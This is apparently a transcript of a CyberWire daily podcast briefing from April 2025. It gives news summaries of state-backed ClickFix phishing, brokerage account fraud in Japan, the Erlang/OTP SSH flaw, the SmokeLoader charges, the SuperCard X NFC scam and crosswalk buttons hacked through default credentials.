When fake fixes hide real attacks.

Adversary nations are using ClickFix in cyber espionage campaigns. Japan’s Financial Services Agency issues an urgent warning after hundreds of millions in unauthorized trades. The critical Erlang/OTP’s SSH vulnerability now has public exploits. A flawed rollout of a new Microsoft Entra app triggers widespread account lockouts. The alleged operator of SmokeLoader malware faces federal hacking charges. A new scam blends social engineering, malware, and NFC tech to drain bank accounts. GSA employees may have been oversharing sensitive documents. Yoni Shohet, Co-Founder and CEO of Valence Security, who cautions financial organizations of coming Chinese open source AI. Crosswalks in the crosshairs of satirical hacking. 

Today is Monday April 21st 2025. I’m Dave Bittner. And this is your CyberWire Intel Briefing.

Adversary nations are using ClickFix in cyber espionage campaigns. 

Government-backed hackers from North Korea, Iran, and Russia are now using a technique called ClickFix in cyber espionage campaigns, according to Proofpoint. This method tricks users into running malicious commands by displaying fake error messages or security alerts. Victims believe they’re fixing a problem but instead activate malware.

North Korea’s TA427 used ClickFix in early 2025 to target think tanks via fake meeting invites. Iran’s TA450 deployed it in late 2024 against Middle Eastern financial and government sectors through bogus Microsoft update emails. Russian groups TA422 and UNK_RemoteRogue also used it in phishing campaigns.

While not replacing all attack methods, ClickFix is being used to streamline infection steps. Proofpoint notes that Chinese hackers haven’t used ClickFix yet, but its growing use signals a rising trend among state-backed groups.

In spring 2024, Russian-linked hackers breached water plants in rural Texas, including in Muleshoe, triggering system malfunctions. While no ransom was demanded, the attack highlighted critical infrastructure vulnerabilities—an urgent concern for cybersecurity professionals.

These incidents weren’t isolated. Experts say they represent a growing trend: state-backed actors probing U.S. systems to test digital defenses. Similar threats include China’s Volt Typhoon and Salt Typhoon campaigns, which targeted telecom networks and government communications for long-term espionage.

Despite this rising threat landscape, the U.S. has weakened cyber defenses under the Trump administration—firing NSA leadership, cutting election security budgets, and slashing cybersecurity staff.

Some say the cybersecurity workforce gap remains a pressing issue, with over 500,000 professionals needed, while others are skeptical that the so-called gap even exists. Either way, as global tensions escalate and adversaries cooperate digitally, cyber pros must prepare for more complex, persistent, and politically motivated attacks.

Japan’s Financial Services Agency issues an urgent warning after hundreds of millions in unauthorized trades. 

Japan’s Financial Services Agency (FSA) has issued an urgent warning after hackers conducted over $665 million in unauthorized trades via compromised brokerage accounts. Using phishing sites posing as legitimate firms, attackers stole customer credentials to access and manipulate accounts—often selling Japanese stocks to purchase Chinese ones, which remain in the victims’ accounts. At least 12 securities firms, including Nomura and Rakuten, reported 1,454 fraudulent trades and over 3,300 illegal access attempts. Brokerages will cover customer losses. Japan links rising threats to China-backed cyberattacks.

The critical Erlang/OTP’s SSH vulnerability now has public exploits. 

A critical vulnerability in Erlang/OTP’s SSH daemon (CVE-2025-32433) now has public exploits, putting thousands of systems at risk. The flaw allows unauthenticated remote code execution and affects all devices using the daemon. Although patched in versions 25.3.2.10 and 26.2.4, many systems—especially in telecom and database infrastructure—remain unpatched. Proof-of-concept exploits were recently shared on GitHub and Pastebin, raising the risk of mass exploitation. Security experts urge immediate updates as attackers are expected to begin scanning and exploiting vulnerable systems.

A flawed rollout of a new Microsoft Entra app triggers widespread account lockouts.  

A flawed rollout of Microsoft Entra ID’s new “MACE Credential Revocation” app has triggered widespread false positive alerts and account lockouts across organizations. Admins reported that up to one-third of accounts were locked due to supposed leaked credentials, though the passwords were unique and protected by MFA. No signs of compromise were found, and breach checks showed no matches. The issue, linked to error code 53003, appears tied to MACE’s sudden deployment. Microsoft has yet to officially confirm the cause.

The alleged operator of SmokeLoader malware faces federal hacking charges. 

Nicholas Moses, also known as “scrublord,” is facing federal hacking charges in Vermont for allegedly operating the SmokeLoader malware, stealing personal data from over 65,000 victims worldwide. Prosecutors say Moses used the malware to harvest passwords and sensitive information from infected devices between January 2022 and May 2023, maintaining a command server in the Netherlands. He allegedly sold stolen credentials for $1 to $5 each and claimed to have over half a million logs. SmokeLoader, a malware strain active since 2011, is popular among Russian cybercriminals for its modular design and ability to perform various attacks. Moses’s case follows Europol’s Operation Endgame, which recently targeted major malware droppers, including SmokeLoader. Authorities continue to investigate and arrest individuals linked to the botnet’s distribution and resale operations.

A new scam blends social engineering, malware, and NFC tech to drain bank accounts. 

A new scam blending social engineering, malware, and NFC tech is targeting Android users and their payment cards, researchers at Cleafy report. Dubbed SuperCard X, the malware tricks victims via fake bank fraud alerts, urging them to call a number where scammers then collect PINs and convince users to remove card limits. Victims are later prompted to place their card near their infected device. The malware then uses NFC to silently capture card data, enabling instant theft outside traditional bank fraud channels. SuperCard X is linked to a malware-as-a-service (MaaS) model operated by Chinese-speaking developers, but used by different groups globally. Unlike past scams targeting specific banks, this campaign targets any debit or credit card. Authorities warn such NFC-based fraud is growing and may appear in more regions soon.

GSA employees may have been oversharing sensitive documents. 

Internal records reviewed by The Washington Post reveal that General Services Administration (GSA) employees under both the Biden and Trump administrations improperly shared sensitive files—including White House blueprints and vendor banking details—with over 11,200 federal workers. The documents, stored in a Google Drive folder, included at least nine files marked “Controlled Unclassified Information” (CUI), which, while not classified, still require protection. Some files allowed editing access. The oversharing, ongoing since 2021, triggered a cybersecurity investigation last week. The breach included sensitive plans for the White House’s East and West Wings, and details for a proposed blast door. Though not necessarily classified, experts say such data should be tightly secured. The GSA has annual security training and scanning tools, but the incident highlights systemic weaknesses in document handling across administrations.

 

 

Crosswalks in the crosshairs of satirical hacking. 

And finally, our malicious jaywalking desk tells us that crosswalk buttons in cities like Seattle and Silicon Valley have been hijacked to play AI-generated voices of tech billionaires like Jeff Bezos, Elon Musk, and Mark Zuckerberg. Instead of the usual robotic “Walk” or “Wait,” pedestrians were greeted with Bezos promoting Amazon Prime or joking about billionaires moving to Florida if taxed—classic parody wrapped in high-tech mischief.

The culprit? A mix of social commentary and shoddy security. The devices, made by crosswalk hardware giant Polara, are managed via a Bluetooth-enabled app called the Polara Field Service app. It was publicly available and protected only by the worst password in tech history—1234. Pranksters easily reprogrammed the devices to play custom, AI-generated audio.

While some call it “harmless fun,” the stunt raises serious issues. Visually impaired pedestrians depend on these audio cues to cross safely. Swapping them for tech tycoon impersonations isn’t just a laugh—it’s a hazard. It also highlights the risks of default credentials in critical infrastructure.

The app has since been pulled from app stores, but archived versions remain, meaning this could happen again. Municipal crews now face the tedious task of manually updating credentials on thousands of devices, one intersection at a time.

So, let this be a friendly PSA: customizable crosswalk audio? Great. Billionaire bedtime banter at intersections? Not so much. And for the love of pedestrians—change your default passwords.

And that’s the CyberWire.

For links to all of today’s stories, check out our Daily Briefing at the cyberwire dot com.

 

 

We’d love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like the show, please share a rating and review in your podcast app. Please also fill out the survey in the show notes or send an email to cyberwire@n2k.com

We’re privileged that N2K CyberWire is part of the daily routine of the most influential leaders and operators in the public and private sector, from the Fortune 500 to many of the world’s preeminent intelligence and law enforcement agencies.

N2K makes it easy for companies to optimize your biggest investment, your people. We make you smarter about your teams, while making your teams smarter. Learn how at n2k.com.

 

N2K’s senior producer is Alice Carruth. Our CyberWire producer is Liz Stokes. We’re mixed by Tré Hester, with original music and sound design by Elliott Peltzman. Our executive producer is Jennifer Eiben. Peter Kilpe is our publisher, and I’m Dave Bittner. Thanks for listening.